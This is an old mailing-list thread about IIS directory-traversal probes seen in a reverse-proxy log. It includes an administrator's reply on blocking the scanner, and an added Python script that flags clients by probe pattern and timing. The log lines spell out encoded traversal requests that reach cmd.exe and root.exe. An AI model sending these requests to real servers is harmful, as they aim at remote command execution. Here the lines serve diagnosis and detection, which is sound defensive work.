If you check the time constraints between each attempted security circumvention scan, you will see that they are very close. Almost assuredly, it is from an automated vulnerability scanner. My guess would be that they probably are not using a Linux binary such as nessus, or ISS. Because they are obviously not educated enough to be able to determine a win32 system from a Linux box?! Figures! None of the posted vulnerabilities are recent.

Add them to hosts.deny... and send an email to their ISP at registry@isp.iberbanda.es, ricardo.ponce@iberbanda.es, or maybe abuse@iberbanda.es.

HTH.

Thomas Jones
i-Null.com Network Administrator

On Thursday 10 October 2002 17:11, mailinglists@belfin.ch wrote:
Hello
our reverse proxy picked this up
1034211881.427 22 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - NONE/- -
1034211881.925 13 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - NONE/- -
1034211882.393 19 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe? - NONE/- -
1034211882.852 10 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe? - NONE/- -
1034211883.297 5 217.11.99.90 TCP_MISS/503 1168 GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe? - NONE/- -
1034211883.836 20 217.11.99.90 TCP_MISS/503 1164 GET http://www/scripts/..%%35c../winnt/system32/cmd.exe? - NONE/- -
1034211887.664 22 217.11.99.90 TCP_MISS/503 1172 GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe? - NONE/- -
1034211888.285 19 217.11.99.90 TCP_MISS/503 1164 GET http://www/scripts/..%252f../winnt/system32/cmd.exe? - NONE/- -
1034215688.223 16 217.11.99.90 TCP_MISS/503 1116 GET http://www/scripts/root.exe? - NONE/- -
1034215689.027 29 217.11.99.90 TCP_MISS/503 1112 GET http://www/MSADC/root.exe? - NONE/- -
1034215689.564 13 217.11.99.90 TCP_MISS/503 1132 GET http://www/c/winnt/system32/cmd.exe? - NONE/- -
1034215690.138 3 217.11.99.90 TCP_MISS/503 1132 GET http://www/d/winnt/system32/cmd.exe? - NONE/- -
1034215690.962 20 217.11.99.90 TCP_MISS/503 1164 GET http://www/scripts/..%255c../winnt/system32/cmd.exe? - NONE/- -
1034215691.552 27 217.11.99.90 TCP_MISS/503 1206 GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - NONE/- -
1034215692.265 19 217.11.99.90 TCP_MISS/503 1206 GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - NONE/- -
1034215693.017 10 217.11.99.90 TCP_MISS/503 1262 GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c . ./winnt/s
Is there some new IIS/Windows worm spreading?
Thanks, Philipp
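
The timing argument made in the reply can be checked mechanically against a Squid access log. The following is an added example, not code from either poster: it groups probe-like requests by client and flags clients whose median gap between probes is machine-fast. The sample lines are constructed in the same log format with documentation-range addresses, and the function names and thresholds are assumptions.

```python
import re
from collections import defaultdict
from statistics import median
from urllib.parse import unquote

# Squid native access.log: time elapsed client code/status bytes method URL ...
LINE = re.compile(r"^(\d+\.\d+)\s+\d+\s+(\S+)\s+\S+/\d{3}\s+\d+\s+\S+\s+(\S+)")
# Path fragments typical of the IIS probes in the log above
PROBE = re.compile(r"(cmd\.exe|root\.exe|\.\.[/\\])", re.I)

# Constructed sample: one fast prober, one ordinary client
SAMPLE = """\
1034211881.427 22 192.0.2.10 TCP_MISS/503 1166 GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe? - NONE/- -
1034211881.925 13 192.0.2.10 TCP_MISS/503 1166 GET http://www/scripts/..%255c../winnt/system32/cmd.exe? - NONE/- -
1034211882.393 19 192.0.2.10 TCP_MISS/503 1116 GET http://www/scripts/root.exe? - NONE/- -
1034211882.852 10 192.0.2.10 TCP_MISS/503 1132 GET http://www/c/winnt/system32/cmd.exe? - NONE/- -
1034211890.000 40 198.51.100.7 TCP_MISS/200 5120 GET http://www/index.html - DIRECT/10.0.0.5 text/html
1034211935.500 35 198.51.100.7 TCP_MISS/200 2048 GET http://www/docs/faq.html - DIRECT/10.0.0.5 text/html
""".splitlines()

def is_probe(url):
    """Match the raw URL and a twice-decoded copy, so %255c -> %5c -> \\ is caught."""
    decoded = url
    for _ in range(2):
        decoded = unquote(decoded, errors="replace")
    return bool(PROBE.search(url) or PROBE.search(decoded))

def flag_scanners(lines, max_median_gap=1.0, min_probes=3):
    """Return {client: (probe_count, median_gap_seconds)} for clients
    whose probe requests arrive at machine-like intervals."""
    times = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if m and is_probe(m.group(3)):
            times[m.group(2)].append(float(m.group(1)))
    flagged = {}
    for client, ts in times.items():
        if len(ts) < min_probes:
            continue  # too few probes to judge timing
        ts.sort()
        gap = median(b - a for a, b in zip(ts, ts[1:]))
        if gap <= max_median_gap:
            flagged[client] = (len(ts), round(gap, 3))
    return flagged

if __name__ == "__main__":
    for client, (count, gap) in flag_scanners(SAMPLE).items():
        print(f"{client}: {count} probes, median gap {gap}s")
```
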